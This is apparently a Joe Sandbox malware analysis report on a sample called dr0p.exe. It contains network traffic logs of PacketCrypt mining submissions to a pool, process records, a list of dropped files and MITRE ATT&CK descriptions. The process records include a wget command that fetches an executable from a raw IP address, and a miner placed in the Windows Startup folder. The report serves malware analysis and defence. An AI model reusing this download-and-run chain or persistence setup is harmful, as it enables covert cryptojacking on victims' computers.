Jan 7, 2025 12:00:36.533344030 CET	7416	OUT	Data Raw: 28 8e 3f 8c f7 86 e2 19 33 a9 0d 0a 34 30 30 0d 0a 01 d7 d9 01 3a ec 60 58 b4 43 17 1f ed 49 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: (?3400:`XCI+fp6UO(HAl<K{p~Td FQ3+KPt3(JXQCc%ELET*W\|(il`5_Jg~vg0:9Pgj
Jan 7, 2025 12:00:36.533462048 CET	4944	OUT	Data Raw: fa db b8 f9 80 62 c0 81 7e 87 c2 28 1c e7 10 5f 6d c6 bb 1b 29 d9 e3 04 e0 a3 2f fc 36 f6 92 43 8f aa cd 05 3a 76 ec 94 0a 0b 65 ea 5a 29 4b 26 5e 45 23 04 4c e7 e1 b3 90 a8 e3 a3 ea bd 6f 70 19 38 d2 e2 55 7f a7 41 cc 64 b0 44 eb b7 d9 e9 80 0c Data Ascii: b~(_m)/6C:veZ)K&^E#Lop8UAdD45t>b\Dw'[lqh2P/(5_$NqrzT\c]c-q$v(G.LQws+:z<LfH\|'nlgc~$HmO\|I 5R4\|R?
Jan 7, 2025 12:00:36.533476114 CET	2472	OUT	Data Raw: 22 d9 d5 b6 09 7d 57 fd 33 58 91 f4 03 32 ac b1 c3 ba ae cd 8f 57 0d 0a 34 30 30 0d 0a 01 53 cf 02 39 ec 60 58 b4 43 17 1f ed 49 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: "}W3X2W400S9`XCI+Guy~%0h[6+ P6>Yc_R.<uw+rLk4ciSfDe:A~x=Q#b$5lg%1
Jan 7, 2025 12:00:36.533494949 CET	2472	OUT	Data Raw: d5 8b 9f 5b f2 45 90 2a 77 dd fd 1f d8 39 3a 97 3d 02 0a 0c a0 a4 b4 ef 69 02 4e 43 6b da 76 da a7 24 32 1d 0c cd 51 95 24 ff 43 3c b7 a7 6b 4d d2 6d 52 f4 fc e9 63 94 78 52 f9 11 ef 01 27 96 51 f1 39 46 d8 3e a7 a6 e6 b2 c3 a3 c6 6c d9 6f 49 ef Data Ascii: [Ew9:=iNCkv$2Q$C<kMmRcxR'Q9F>loID:CeNqK&Z`.\|ad4KXrU8l4_ x>z \xro2!(qSY0@w{m8OtYv--~R?WvAj
Jan 7, 2025 12:00:36.533565044 CET	2472	OUT	Data Raw: da 6a f7 c6 8e ce 8e 94 7e 1e 8f fa 85 bc 50 98 79 87 f8 9c 04 b5 61 42 bc c0 c3 b8 87 4f 3a 1c 0c 4b 93 fe 29 37 32 31 bc 92 d5 89 90 67 c0 c0 d1 01 72 2a 91 ce 66 5a f5 73 e2 68 b2 f1 cb 0a 2b 22 80 82 9a 7e 80 60 7f 5f 3b 47 99 73 73 dd a8 14 Data Ascii: j~PyaBO:K)721grfZsh+"~`_;GssU9j(es19Ue,D,+X\|,U],`]IFj(m@_/)3]t5{H;r}iN6lMWB400=
Jan 7, 2025 12:00:36.533581972 CET	2472	OUT	Data Raw: 09 50 f7 19 08 e3 7c 7a 93 61 fc 34 b8 78 25 1b 80 e8 8a 4a a9 55 08 af 1a 21 40 56 07 07 53 11 d6 05 d0 e0 30 f4 1c 1c f0 e1 cd b3 71 48 e8 39 c9 95 3a 5f 9a e0 8c e4 f7 12 b1 a6 08 16 a5 33 fd 60 c5 f7 61 ef ab b0 4f 6e 9c 6a aa 16 8c 98 0b e8 Data Ascii: P\|za4x%JU!@VS0qH9:_3`aOnjb^DHC-oE6sx!iKVbF\|g`f"PLiPAHf`L6~aoLx[}`0)'w KB
Jan 7, 2025 12:00:36.538122892 CET	2472	OUT	Data Raw: 51 9e ef 41 b7 b2 26 02 c0 dc 36 88 2d b0 ea 18 b8 da 7e df 61 eb ce ac ac 09 f0 38 3b 7e e4 cd 15 e9 d8 6a 93 3b 75 fc 8f fd ac 04 b7 ff 1a 57 a2 b1 a8 73 a1 38 d0 af d6 07 18 15 02 8a 87 d2 4f 47 5e fb 78 8d a3 e9 b8 94 94 1b 4c e0 e1 54 80 40 Data Ascii: QA&6-~a8;~j;uWs8OG^xLT@NnLA->FE`sJVBws:Kuj'=K#g~Q%{wS,o\T;V;a9R)(kiXv\aZt@t'La1
Jan 7, 2025 12:00:36.538319111 CET	4944	OUT	Data Raw: 95 10 93 fd e4 9c d8 55 55 d5 2b 16 16 fa f3 21 97 c5 67 07 d6 23 82 bc d5 e7 e5 57 07 1f ae 48 d1 29 0d 0a 34 30 30 0d 0a 01 d9 d2 00 3b ec 60 58 b4 43 17 1f ed 49 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: UU+!g#WH)400;`XCI+w)fa%e9=A{!YusWj-Kn&]DtZ_M2yDPu^z#3]Do?039"sBH'(ELC
Jan 7, 2025 12:00:37.741600037 CET	451	IN	HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Tue, 07 Jan 2025 11:00:37 GMT Content-Type: application/json Content-Length: 296 Connection: keep-alive Data Raw: 7b 22 77 61 72 6e 22 3a 5b 5d 2c 22 65 72 72 6f 72 22 3a 5b 5d 2c 22 72 65 73 75 6c 74 22 3a 7b 22 74 79 70 65 22 3a 22 61 6e 6e 73 22 2c 22 61 63 63 65 70 74 65 64 22 3a 34 38 30 2c 22 64 75 70 22 3a 30 2c 22 69 6e 76 61 6c 22 3a 30 2c 22 62 61 64 48 61 73 68 22 3a 30 2c 22 72 75 6e 74 22 3a 30 2c 22 69 6e 74 65 72 6e 61 6c 45 72 72 22 3a 30 2c 22 70 61 79 54 6f 22 3a 22 70 6b 74 31 71 78 79 73 63 35 38 67 34 63 77 77 61 75 74 67 36 64 72 34 70 37 71 37 73 64 36 74 6e 32 6c 64 67 75 6b 74 68 35 61 22 2c 22 75 6e 73 69 67 6e 65 64 22 3a 34 38 30 2c 22 74 6f 74 61 6c 4c 65 6e 22 3a 30 2c 22 74 61 72 67 65 74 22 3a 35 32 31 36 31 38 33 35 36 2c 22 74 69 6d 65 22 3a 31 37 33 36 32 34 37 36 33 37 36 31 35 2c 22 65 76 65 6e 74 49 64 22 3a 22 63 61 68 2d 32 38 33 36 39 37 33 2d 35 36 33 31 31 32 33 43 32 41 46 35 43 42 32 44 33 37 38 44 46 31 33 30 34 33 43 45 46 41 34 35 22 7d 7d Data Ascii: {"warn":[],"error":[],"result":{"type":"anns","accepted":480,"dup":0,"inval":0,"badHash":0,"runt":0,"internalErr":0,"payTo":"pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a","unsigned":480,"totalLen":0,"target":521618356,"time":1736247637615,"eventId":"cah-2836973-5631123C2AF5CB2D378DF13043CEFA45"}}

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 12:00:46.591360092 CET	277	OUT	POST /anns/submit?cookie=913d38187b501dda5b38d1278781cb52f1c59d67b33093931b60ad55633c13b0 HTTP/1.1 x-pc-payto: pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a x-pc-sver: 1 x-pc-annver: 1 x-pc-worknum: 2836974 accept: / host: any.ah.pkt.world transfer-encoding: chunked
Jan 7, 2025 12:00:46.591463089 CET	11124	OUT	Data Raw: 34 30 30 0d 0a 01 b5 bf 07 39 ec 60 58 b4 43 17 1f ed 49 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 4009`XCI+Jp'A<G6)U47CI4'~MQBY!ESuN~(^kmO,wxJ"h;m;@;7t.A4Lo?n`1GX0v&YpC
Jan 7, 2025 12:00:46.596182108 CET	1236	OUT	Data Raw: b0 37 64 20 41 00 b4 1d c6 7f b2 f8 d9 46 d8 7f c3 cb 91 5d 97 d9 fa 50 c0 bc 4e e1 9a 19 2d 03 29 70 99 b9 4f ae 93 ab 61 21 d8 d3 20 d2 eb 19 b5 78 99 fa a6 2f ba a6 68 63 de 08 41 e2 26 7d b4 85 a7 ad eb 4f 2a 88 17 4a 76 a0 b5 af 6c 6a b1 8e Data Ascii: 7d AF]PN-)pOa! x/hcA&}OJvljA/#y7p ]WD,+X\|,U],`]IFj(m@_/)3]t5DJMB\|!9h$;F)j}4002:`XCI+
Jan 7, 2025 12:00:46.596334934 CET	2472	OUT	Data Raw: 54 76 f8 12 90 76 50 a1 7f a2 0d 0a 34 30 30 0d 0a 01 67 aa 05 3c ec 60 58 b4 43 17 1f ed 49 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: TvvP400g<`XCI+? :R,Icmcdn~*}=xFW[)geC=#NJ5U]Q5%F/MrXewyo%Y!F3V
Jan 7, 2025 12:00:46.596379042 CET	4944	OUT	Data Raw: 00 e1 73 33 04 a0 59 e6 77 25 1c ae c8 16 0b 38 9e 47 49 0b 2a 8d 98 17 3b 2d a0 3d 6a 11 e6 8c 31 09 36 74 d4 8b 48 c3 ad 71 6e b7 1a b0 df 53 b8 85 36 9e bf c7 7f cd 2a 4d a9 93 fb 7d 67 58 ae 0f 27 bd 19 db 6a ad 7c e5 eb a0 df 9b b8 be 2e e6 Data Ascii: s3Yw%8GI;-=j16tHqnS6M}gX'j\|.7XBwjFc5zGFG]TVtYoK{?sYZ{5STlT[\|@?ak"1`$=^euNx:De~jX3q)@cfTM;K\gp9u\jo`mlDW
Jan 7, 2025 12:00:46.596391916 CET	2472	OUT	Data Raw: 20 a6 3a b9 bc 68 95 db d3 fe f8 5c 99 f7 30 de fa c3 86 9e 51 ce 24 95 57 45 88 1c 1d 12 14 ec 7f c2 e2 74 80 9f 3d da 14 b7 49 7b 33 49 bb 5e 6b c6 1a f0 29 98 4c af 14 02 70 51 89 6d d2 68 9c 98 66 d6 41 f8 5a a8 86 e4 75 3c 0b e1 7d 83 b4 03 Data Ascii: :h\0Q$WEt=I{3I^k)LpQmhfAZu<}NlVw0TGI`zIWMt!fk1_?VIvGX,.Z/<Js`&<.^n8h XP9`({gCkCJ
Jan 7, 2025 12:00:46.596430063 CET	4944	OUT	Data Raw: 14 c5 a8 ed ac 22 fa b6 0e 53 13 8e 8a a4 86 1e d6 7f 19 ec 94 f9 a1 93 93 d5 34 16 da c3 64 be e4 ef af 5b 3a bf 66 29 e4 68 77 45 7d 12 70 f6 70 29 b1 44 fe 23 69 8c 44 70 31 74 11 0e b5 f3 2b 53 91 62 b9 18 7a 16 01 cd b0 f2 d2 43 e0 1a 00 7c Data Ascii: "S4d[:f)hwE}pp)D#iDp1t+SbzC\|oAn4`ppN,$u95s\."oP2?_tXj5 {O bg\(/ZfY(C@O5uxHB@8
Jan 7, 2025 12:00:46.596447945 CET	2472	OUT	Data Raw: 5f 7e b4 1c f9 fb b6 39 d6 28 62 35 92 f9 ec 34 3a b9 3a 55 3d f8 04 67 02 35 0c 64 ac 02 90 a7 d7 3b 15 0d fa 82 f2 64 52 62 1a 75 57 93 3d 62 18 da 62 8d b4 d0 c4 6f 78 fd 5e d2 87 80 4f 3d 71 50 ff 07 c3 29 14 24 61 59 44 91 50 c1 43 7e cc 45 Data Ascii: _~9(b54::U=g5d;dRbuW=bbox^O=qP)$aYDPC~E/&ZD~pF+LS/a-kbh2"x2w6_sDN`\'EDo[c#Bd91Fi*k`4[r@cC6neYskch
Jan 7, 2025 12:00:46.596472979 CET	2472	OUT	Data Raw: 95 8e 7b 81 7f 0b e6 4b c9 03 7c e5 29 b7 ca 8d 11 8b 88 2d c2 15 c8 57 b7 ca 68 28 2d 44 bf b1 f6 cf 27 25 2d c9 d7 da 65 26 76 fc 5d 7e ad 1e e6 aa ee ca 39 2b 6d 14 70 63 fc 36 b1 37 27 cd 68 be a2 aa cc 5e c7 a5 ca b6 ee 94 cf 2f 08 2b c6 ac Data Ascii: {K\|)-Wh(-D'%-e&v]~9+mpc67'h^/+!7_wAu-XoT2P'(U>jv\dLD,+X\|,U],`]IFj(m@_/)3]t5nmTX;>\X-Qnjw4QI?2,400p
Jan 7, 2025 12:00:46.596503973 CET	2472	OUT	Data Raw: 80 d5 d3 a4 15 be b7 6f 59 8c 69 de 3f e0 de ff 72 b1 e6 07 ee 40 f4 fb 53 0d 9a 98 19 10 86 f0 14 cf 5b c9 8d a1 4c 4c f2 b8 d4 c7 e4 f2 85 5b e1 92 32 29 1c 5e 2e 04 19 b5 c8 8b 3d 69 a5 48 a6 b6 e1 d9 f2 4f ce b3 4d 80 fc 36 4f a6 44 f4 9a 11 Data Ascii: oYi?r@S[LL[2)^.=iHOM6ODU!=ZBU#\AtR%`;lPs9{1q=/svN'flPDq;8VDz%PzRA.FwVCf<u}"z69\|T
Jan 7, 2025 12:00:46.600976944 CET	2472	OUT	Data Raw: b9 91 e2 fa a5 e2 8e ef 16 dc e1 6d 0c 6a 60 21 54 32 e4 ba 58 18 22 58 16 eb 2e cd f0 a4 2f 05 45 cf 15 8a 05 73 c9 4f f1 2d b9 80 a5 d2 a8 bd 04 19 9e e2 fa 93 71 a5 01 d1 3e bd 90 19 3e 6a 6a b1 fc 65 1a ee b5 dd 14 0e dc 93 2d 79 30 ac a6 07 Data Ascii: mj`!T2X"X./EsO-q>>jje-y0"!7`D@8Z3qMdq2 pL`p)2Y8WF]]$CC2z($R0;LAa8SLi}A ld8;sk~!9
Jan 7, 2025 12:00:47.848762035 CET	451	IN	HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Tue, 07 Jan 2025 11:00:47 GMT Content-Type: application/json Content-Length: 296 Connection: keep-alive Data Raw: 7b 22 77 61 72 6e 22 3a 5b 5d 2c 22 65 72 72 6f 72 22 3a 5b 5d 2c 22 72 65 73 75 6c 74 22 3a 7b 22 74 79 70 65 22 3a 22 61 6e 6e 73 22 2c 22 61 63 63 65 70 74 65 64 22 3a 35 32 34 2c 22 64 75 70 22 3a 30 2c 22 69 6e 76 61 6c 22 3a 30 2c 22 62 61 64 48 61 73 68 22 3a 30 2c 22 72 75 6e 74 22 3a 30 2c 22 69 6e 74 65 72 6e 61 6c 45 72 72 22 3a 30 2c 22 70 61 79 54 6f 22 3a 22 70 6b 74 31 71 78 79 73 63 35 38 67 34 63 77 77 61 75 74 67 36 64 72 34 70 37 71 37 73 64 36 74 6e 32 6c 64 67 75 6b 74 68 35 61 22 2c 22 75 6e 73 69 67 6e 65 64 22 3a 35 32 34 2c 22 74 6f 74 61 6c 4c 65 6e 22 3a 30 2c 22 74 61 72 67 65 74 22 3a 35 32 31 36 31 38 33 35 36 2c 22 74 69 6d 65 22 3a 31 37 33 36 32 34 37 36 34 37 37 31 35 2c 22 65 76 65 6e 74 49 64 22 3a 22 63 61 68 2d 32 38 33 36 39 37 33 2d 39 39 36 45 36 45 35 43 44 31 37 30 42 43 30 31 46 31 45 37 41 33 46 36 33 35 38 46 35 43 41 35 22 7d 7d Data Ascii: {"warn":[],"error":[],"result":{"type":"anns","accepted":524,"dup":0,"inval":0,"badHash":0,"runt":0,"internalErr":0,"payTo":"pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a","unsigned":524,"totalLen":0,"target":521618356,"time":1736247647715,"eventId":"cah-2836973-996E6E5CD170BC01F1E7A3F6358F5CA5"}}

Target ID:	0
Start time:	05:58:51
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://23.27.51.244/dr0p.exe" > cmdline.out 2>&1
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	4
Start time:	05:58:52
Start date:	07/01/2025
Path:	C:\Users\user\Desktop\download\dr0p.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\download\dr0p.exe"
Imagebase:	0x400000
File size:	541 bytes
MD5 hash:	5290766026D3727C3262FD48DB6DB0A4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	6
Start time:	05:59:27
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pkt1.exe"
Imagebase:	0x7ff646bd0000
File size:	42'445'246 bytes
MD5 hash:	5F6CDA0F181FE14E6D395CDB50C37C41
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Target ID:	8
Start time:	05:59:33
Start date:	07/01/2025
Path:	C:\Users\user\AppData\Local\Temp\packetcrypt.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\packetcrypt.exe" ann -p pkt1qxysc58g4cwwautg6dr4p7q7sd6tn2ldgukth5a http://pool.pkt.world
Imagebase:	0x7ff6326a0000
File size:	23'509'956 bytes
MD5 hash:	82C7D11916FDFBF24EAE6BF9200A48C9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Rust
Reputation:	low
Has exited:	false

Execution Coverage:	99.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	18
Total number of Limit Nodes:	0

Execution Coverage:	23.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	75%
Total number of Nodes:	4
Total number of Limit Nodes:	0

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report http://23.27.51.244/dr0p.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\Microsoft.CSharp.dll

C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\Microsoft.VisualBasic.Core.dll

C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\Microsoft.VisualBasic.dll

C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\Microsoft.Win32.Primitives.dll

C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\Microsoft.Win32.Registry.dll

C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\PacketCryptApp.deps.json

C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\PacketCryptApp.dll

C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\PacketCryptApp.runtimeconfig.json

C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.AppContext.dll

C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Buffers.dll

C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Collections.Concurrent.dll

C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Collections.Immutable.dll

C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Collections.NonGeneric.dll

C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Collections.Specialized.dll

C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.Collections.dll

C:\Users\user\AppData\Local\Temp\.net\pkt1\1824\System.ComponentModel.Annotations.dll

Windows Analysis Report
http://23.27.51.244/dr0p.exe

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre